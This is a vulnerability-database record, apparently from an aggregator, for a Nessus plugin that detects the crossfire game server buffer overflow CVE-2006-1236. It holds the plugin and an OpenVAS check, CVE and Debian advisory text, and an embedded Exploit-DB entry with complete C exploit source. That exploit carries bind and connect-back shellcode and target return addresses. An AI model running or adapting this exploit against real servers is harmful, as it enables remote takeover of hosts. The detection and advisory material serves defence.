ID DEBIAN_DSA-1009.NASL Type nessus Reporter This script is Copyright (C) 2006-2021 Tenable Network Security, Inc. Modified 2006-10-14T00:00:00
Description
A buffer overflow has been discovered in the crossfire game which
allows remote attackers to execute arbitrary code.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-1009. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
# Shared Tenable helper libraries used by the registration block below.
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration branch: `description` is presumably set by the engine when it
# only wants plugin metadata; this branch records the attributes and exits
# before any of the host checks further down are executed.
if (description)
{
script_id(22551);
script_version("1.17");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");
# Vulnerability identifiers: the CVE and the Debian advisory this plugin covers.
script_cve_id("CVE-2006-1236");
script_xref(name:"DSA", value:"1009");
script_name(english:"Debian DSA-1009-1 : crossfire - buffer overflow");
script_summary(english:"Checks dpkg output for the updated package");
script_set_attribute(
attribute:"synopsis",
value:"The remote Debian host is missing a security-related update."
);
# Description text is taken verbatim from the advisory (see header comment).
script_set_attribute(
attribute:"description",
value:
"A buffer overflow has been discovered in the crossfire game which
allows remote attackers to execute arbitrary code."
);
script_set_attribute(
attribute:"see_also",
value:"http://www.debian.org/security/2006/dsa-1009"
);
# The two fixed versions named here are the same ones the deb_check() calls
# below compare against (woody = 3.0, sarge = 3.1).
script_set_attribute(
attribute:"solution",
value:
"Upgrade the crossfire package.
For the old stable distribution (woody) this problem has been fixed in
version 1.1.0-1woody2.
For the stable distribution (sarge) this problem has been fixed in
version 1.6.0.dfsg.1-4sarge2."
);
# CVSS v2 base vector: network-reachable, low complexity, no authentication,
# partial confidentiality/integrity/availability impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
# "local" plugin: evidence comes from the host's package list, not a probe.
script_set_attribute(attribute:"plugin_type", value:"local");
# CPE names for the affected package and the two Debian releases checked.
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:crossfire");
script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");
script_set_attribute(attribute:"patch_publication_date", value:"2006/03/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/14");
script_set_attribute(attribute:"vuln_publication_date", value:"2006/03/13");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.");
script_family(english:"Debian Local Security Checks");
# Ordering/prerequisites: ssh_get_info.nasl presumably populates the three KB
# keys required here; the detection code re-checks each of them explicitly.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
# Registration done; nothing below runs in this mode.
exit(0);
}
include("audit.inc");
include("debian_package.inc");
# Preconditions: local checks must be enabled and the host must be a Debian
# system whose dpkg package list has been collected. Each missing item ends
# the plugin with the matching audit() reason instead of a false negative.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
# Fixed versions per Debian release, as published in DSA-1009
# (3.0 = woody, 3.1 = sarge). Releases are iterated from a list so that the
# check order (and therefore the order of the generated report) is fixed.
fixed_versions = make_array(
  "3.0", "1.1.0-1woody2",
  "3.1", "1.6.0.dfsg.1-4sarge2"
);
releases = make_list("3.0", "3.1");
# Binary packages built from the crossfire source package.
packages = make_list("crossfire-doc", "crossfire-edit", "crossfire-server");
# Count how many installed packages are older than the fixed version.
# deb_check() (debian_package.inc) is expected to return true for a
# vulnerable match and to accumulate the report text read back below.
flag = 0;
foreach rel (releases)
{
  foreach pkg (packages)
  {
    if (deb_check(release:rel, prefix:pkg, reference:fixed_versions[rel])) flag++;
  }
}
# Report a hole if anything matched; attach package details when verbose.
if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "DEBIAN_DSA-1009.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-1009-1 : crossfire - buffer overflow", "description": "A buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.", "published": "2006-10-14T00:00:00", "modified": "2006-10-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/22551", "reporter": "This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.", "references": ["http://www.debian.org/security/2006/dsa-1009"], "cvelist": ["CVE-2006-1236"], "type": "nessus", "lastseen": "2021-01-06T09:44:31", "edition": 25, "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-1236"]}, {"type": "osvdb", "idList": ["OSVDB:23904"]}, {"type": "openvas", "idList": ["OPENVAS:56461"]}, {"type": "exploitdb", "idList": ["EDB-ID:1582"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1009-1:1A76A"]}], "modified": "2021-01-06T09:44:31", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-01-06T09:44:31", "rev": 2}, "vulnersScore": 7.1}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1009. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22551);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-1236\");\n script_xref(name:\"DSA\", value:\"1009\");\n\n script_name(english:\"Debian DSA-1009-1 : crossfire - buffer overflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1009\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the crossfire package.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.0.dfsg.1-4sarge2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:crossfire\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"crossfire-doc\", reference:\"1.1.0-1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"crossfire-edit\", reference:\"1.1.0-1woody2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"crossfire-server\", reference:\"1.1.0-1woody2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"crossfire-doc\", reference:\"1.6.0.dfsg.1-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"crossfire-edit\", reference:\"1.6.0.dfsg.1-4sarge2\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"crossfire-server\", reference:\"1.6.0.dfsg.1-4sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "pluginID": "22551", "cpe": ["cpe:/o:debian:debian_linux:3.1", "cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:crossfire"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:48:13", "description": "Buffer overflow in the SetUp function in socket/request.c in CrossFire 1.9.0 allows remote attackers to execute arbitrary code via a long setup sound command, a different vulnerability than CVE-2006-1010.", "edition": 3, "cvss3": {}, "published": "2006-03-15T00:02:00", "title": "CVE-2006-1236", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2006-1236"], "modified": "2017-10-11T01:30:00", "cpe": ["cpe:/a:crossfire:crossfire:1.9.0"], "id": "CVE-2006-1236", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1236", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:crossfire:crossfire:1.9.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-1236"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in CrossFire. CrossFire fails to properly handle boundary conditions within the SetUp() function in \"request.c\" when handling malicious content received in the \"setup\" command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Crossfire has released a patch to address this vulnerability. 
Upgrade the \"request.c\" file to at least version 1.86\n## Short Description\nA remote overflow exists in CrossFire. CrossFire fails to properly handle boundary conditions within the SetUp() function in \"request.c\" when handling malicious content received in the \"setup\" command resulting in a stack-based buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://crossfire.real-time.com/index.html\nVendor Specific News/Changelog Entry: http://cvs.sourceforge.net/viewcvs.py/crossfire/crossfire/socket/request.c?rev=1.86&view=log\n[Vendor Specific Advisory URL](http://www.debian.org/security/2006/dsa-1009)\n[Secunia Advisory ID:19237](https://secuniaresearch.flexerasoftware.com/advisories/19237/)\n[Secunia Advisory ID:19276](https://secuniaresearch.flexerasoftware.com/advisories/19276/)\nISS X-Force ID: 25252\nGeneric Exploit URL: http://www.milw0rm.com/exploits/1582\nFrSIRT Advisory: ADV-2006-0951\n[CVE-2006-1236](https://vulners.com/cve/CVE-2006-1236)\nBugtraq ID: 17093\n", "modified": "2006-03-13T13:17:36", "published": "2006-03-13T13:17:36", "href": "https://vulners.com/osvdb/OSVDB:23904", "id": "OSVDB:23904", "title": "CrossFire request.c SetUp() Function Remote Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1236"], "description": "The remote host is missing an update to crossfire\nannounced via advisory DSA 1009-1.\n\nA buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56461", "href": 
"http://plugins.openvas.org/nasl.php?oid=56461", "type": "openvas", "title": "Debian Security Advisory DSA 1009-1 (crossfire)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1009_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1009-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.6.0.dfsg.1-4sarge2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.0-2.\n\nWe recommend that you upgrade your crossfire package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201009-1\";\ntag_summary = \"The remote host is missing an update to crossfire\nannounced via advisory DSA 1009-1.\n\nA buffer overflow has been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.\";\n\n\nif(description)\n{\n script_id(56461);\n script_version(\"$Revision: 6616 $\");\n 
script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(17093);\n script_cve_id(\"CVE-2006-1236\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1009-1 (crossfire)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"crossfire-doc\", ver:\"1.1.0-1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-edit\", ver:\"1.1.0-1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-server\", ver:\"1.1.0-1woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-doc\", ver:\"1.6.0.dfsg.1-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-edit\", ver:\"1.6.0.dfsg.1-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"crossfire-server\", ver:\"1.6.0.dfsg.1-4sarge2\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:29:18", "description": "crossfire-server. CVE-2006-1236. Remote exploit for linux platform", "published": "2006-03-13T00:00:00", "type": "exploitdb", "title": "crossfire-server <= 1.9.0 - SetUp Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1236"], "modified": "2006-03-13T00:00:00", "id": "EDB-ID:1582", "href": "https://www.exploit-db.com/exploits/1582/", "sourceData": "// crossfire-server <= 1.9.0 \"SetUp()\" remote buffer overflow\r\n//\r\n// exploit by landser - ihsahn at gmail com\r\n// vote http://shinui.org.il\r\n//\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <arpa/inet.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netdb.h>\r\n\r\n#define PORT 13327 // default port\r\n#define SC_PORT 33333 // default shellcode port\r\n#define SC_HOST \"127.0.0.1\" // default shellcode host\r\n\r\nunsigned char sc_cb[] = // izik's\r\n\t\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\"\r\n\t\"\\x80\\x5b\\x5d\\xbeHOST\\xf7\\xd6\\x56\\x66\\xbdPR\\x0f\\xcd\\x09\\xdd\"\r\n\t\"\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\"\r\n\t\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\"\r\n\t\"\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\";\r\n\r\nunsigned char sc_bind[] = // 
izik's\r\n\t\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\"\r\n\t\"\\x80\\x5b\\x5d\\x52\\x66\\xbdPR\\x0f\\xcd\\x09\\xdd\\x55\\x6a\\x10\\x51\"\r\n\t\"\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb3\\x04\\xb0\\x66\\xcd\\x80\\x5f\"\r\n\t\"\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x93\\xb0\\x02\\xcd\"\r\n\t\"\\x80\\x85\\xc0\\x75\\x1a\\x59\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\"\r\n\t\"\\x0b\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\"\r\n\t\"\\x53\\xeb\\xb2\\x6a\\x06\\x58\\xcd\\x80\\xb3\\x04\\xeb\\xc9\";\r\n\r\nstruct {\r\n\tconst char *type;\r\n\tunsigned char *code;\r\n} shellcodes[] = {\r\n\t{\"bind\",\t\tsc_bind},\r\n\t{\"connectback\",\t\tsc_cb},\r\n};\r\n\r\nstruct {\r\n\tconst char *ver;\r\n\tunsigned long ret; // a \"jmp *%eax\" instruction\r\n\tunsigned short int len;\r\n} targets[] = {\r\n\t{\"crossfire-server_1.6.0.dfsg.1-4_i386.deb\",\t0x080d6f48, 0x1028},\r\n\t{\"crossfire-server_1.8.0-2_i386.deb\",\t\t0x080506d7, 0x1130},\r\n\t{\"crossfire-server_1.9.0-1_i386.deb\",\t\t0x0807aefa, 0x1130},\r\n\t{\"crash\",\t\t\t\t\t0xcccccccc, 0x1300},\r\n};\r\n\r\n#define structsize(x) (sizeof x / sizeof x[0])\r\n\r\nint s;\r\nint n = -1;\r\nunsigned char *sc = sc_bind; // default shellcode\r\nunsigned char buf[0x2000];\r\n\r\nvoid establish (char *, int);\r\nvoid usage (char *);\r\nvoid update (unsigned char *, int, char *);\r\nvoid writebuf (void);\r\n\r\nint main (int argc, char **argv) {\r\n\tint port = 0; // default value\r\n\tunsigned short int sc_port = 0;\r\n\tchar *sc_host = NULL;\r\n\r\n\tprintf(\"cf190.c by landser - ihsahn at gmail com\\n\\n\");\r\n\r\n\tchar c;\r\n\twhile ((c = getopt(argc, argv, \"t:p:h:d:s:\")) != -1) {\r\n\t\tswitch (c) {\r\n\t\t\tcase 's': sc = shellcodes[atoi(optarg)].code; break;\r\n\t\t\tcase 'h': sc_host = strdup(optarg); break;\r\n\t\t\tcase 'd': sc_port = atoi(optarg); break;\r\n\t\t\tcase 't': n = atoi(optarg); break;\r\n\t\t\tcase 'p': port = atoi(optarg); break;\r\n\t\t\tcase 
'?': usage(argv[0]); return EXIT_FAILURE;\r\n\t\t}\r\n\t}\r\n\r\n\tif ((n < 0) || (n >= structsize(targets))) {\r\n\t\tprintf(\"invalid target\\n\");\r\n\t\tusage(argv[0]);\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\t\r\n\tif ((optind + 1) != argc) {\r\n\t\tprintf(\"no hostname\\n\");\r\n\t\tusage(argv[0]);\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\testablish(argv[optind], port ? port : PORT);\r\n\t\r\n\tupdate(sc, sc_port, sc_host);\r\n \r\n\twritebuf();\r\n\r\n\tprintf(\"> sending\\n\");\r\n\r\n\tif (send(s, buf, targets[n].len + 2, 0) < 0) {\r\n\t\tperror(\"send()\");\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\tusleep(100000);\r\n\r\n\tprintf(\"> done\\n\");\r\n\t\r\n\tclose(s);\r\n\r\n\treturn EXIT_SUCCESS;\r\n}\r\n\r\nvoid establish (char *ip, int port) {\r\n\tstruct sockaddr_in sa;\r\n\tstruct hostent *h;\r\n\r\n\tif (!(h = gethostbyname(ip))) {\r\n\t\therror(\"gethostbyname()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tprintf(\"> resolved %s to %s\\n\", ip,\r\n\t\t\tinet_ntoa(**((struct in_addr **)h->h_addr_list)));\r\n\t\r\n\tsa.sin_family = AF_INET;\r\n\tsa.sin_port = htons(port);\r\n\tsa.sin_addr = **((struct in_addr **)h->h_addr_list);\r\n\t\r\n\tif ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\r\n\t\tperror(\"socket()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {\r\n\t\tperror(\"connect()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tprintf (\"> connected to %s:%d.\\n\", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);\r\n}\r\n\r\nvoid usage (char *argv0) {\r\n\tint i;\r\n\t\r\n\tprintf(\"usage: %s -t <target> [-s <shellcode>] \"\r\n\t\t\t\"[-d <connectback/bind port] [-h <connectback ip>] \"\r\n\t\t\t\"host [-p <port>]\\n\", argv0);\r\n\r\n\tprintf(\"- targets:\\n\");\r\n\tfor (i=0;i<structsize(targets);i++)\r\n\t\tprintf(\"%d. %s\\n\", i, targets[i].ver);\r\n\r\n\tprintf(\"- shellcodes: (default 0)\\n\");\r\n\tfor (i=0;i<structsize(shellcodes);i++)\r\n\t\tprintf(\"%d. 
%s\\n\", i, shellcodes[i].type);\r\n}\r\n\r\nvoid update (unsigned char *code, int port, char *host) {\r\n\tif (!port) port = SC_PORT;\r\n\t\r\n\tif (!(port & 0xff) || !((port >> 8) & 0xff)) {\r\n\t\tprintf(\"bad cb port\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\t*(unsigned short int *)(strstr(code, \"PR\")) = port;\r\n\r\n\tif (strstr(code, \"HOST\")) {\r\n\t\tin_addr_t inaddr;\r\n\r\n\t\tif (!host) host = SC_HOST;\r\n\t\tinaddr = inet_addr(host);\r\n\t\t\r\n\t\tif (inaddr == INADDR_NONE || strstr(host, \"255\")) {\r\n\t\t\t// ~(255) is 0\r\n\t\t\tprintf(\"invalid cb hostname\\n\");\r\n\t\t\texit(EXIT_FAILURE);\r\n\t\t}\r\n\t\t*(in_addr_t *)(strstr(code, \"HOST\")) = ~inaddr;\r\n\t}\r\n\t\r\n\tif (host) free(host);\r\n}\r\n\t\r\nvoid writebuf (void) {\r\n\tunsigned char *ptr = buf;\r\n\t\r\n\tmemset(buf, 0x90, sizeof buf);\r\n\r\n\t*ptr++ = (targets[n].len>> 8) & 0xff;\r\n\t*ptr++ = targets[n].len & 0xff;\r\n\t\r\n\tmemcpy(ptr, \"setup sound \", strlen(\"setup sound \"));\r\n\tptr += strlen(\"setup sound \");\r\n\t\r\n\tptr += 120; // leave 120 nops before the shellcode\r\n\tmemcpy(ptr, sc, strlen(sc));\r\n\t\r\n\tptr = &buf[targets[n].len - 10];\r\n\t*(unsigned long *)ptr = targets[n].ret;\r\n}\r\n\r\n// milw0rm.com [2006-03-13]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1582/"}], "debian": [{"lastseen": "2020-11-11T13:16:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1236"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1009-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 21st, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : crossfire\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2006-1236\n\nA buffer overflow has 
been discovered in the crossfire game which\nallows remote attackers to execute arbitrary code.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 1.1.0-1woody2.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 1.6.0.dfsg.1-4sarge2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.9.0-2.\n\nWe recommend that you upgrade your crossfire package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.1.0-1woody2.dsc\n Size/MD5 checksum: 648 c87ae4538c9f9ce8af57fddcdddf3c9e\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.1.0-1woody2.diff.gz\n Size/MD5 checksum: 47426 6b0532a7a8748e3e5a5d81dc25350d13\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire_1.1.0.orig.tar.gz\n Size/MD5 checksum: 3057431 824e6d9a91ee0321629a9e99ad4e264f\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-doc_1.1.0-1woody2_all.deb\n Size/MD5 checksum: 584480 1c75de6980f66906bd52fbca399e2857\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_alpha.deb\n Size/MD5 checksum: 193802 a932826e54d713e18d5393e9036fda02\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_alpha.deb\n Size/MD5 checksum: 2097946 e9dca904054c7fcf5bcf29e294ad333b\n\n ARM 
architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_arm.deb\n Size/MD5 checksum: 156404 89d0da5ac8daffb2e6e064a9eb84fe8b\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_arm.deb\n Size/MD5 checksum: 1994212 f4ce8a9b872dd465f748ce2e706801e4\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_i386.deb\n Size/MD5 checksum: 141220 5f5913df2c1a253d1b4d23ef91877712\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_i386.deb\n Size/MD5 checksum: 1954014 9c1c622d75f4a1125c74e7910a9a1842\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-edit_1.1.0-1woody2_ia64.deb\n Size/MD5 checksum: 243816 97e96103f5b19a73963a14041f12d141\n http://security.debian.org/pool/updates/main/c/crossfire/crossfire-server_1.1.0-1woody2_ia64.deb\n Size/MD5 checksum: 2224064 1b392240b1de7ef6cc5656a0244d45b0\n\n HP Precision 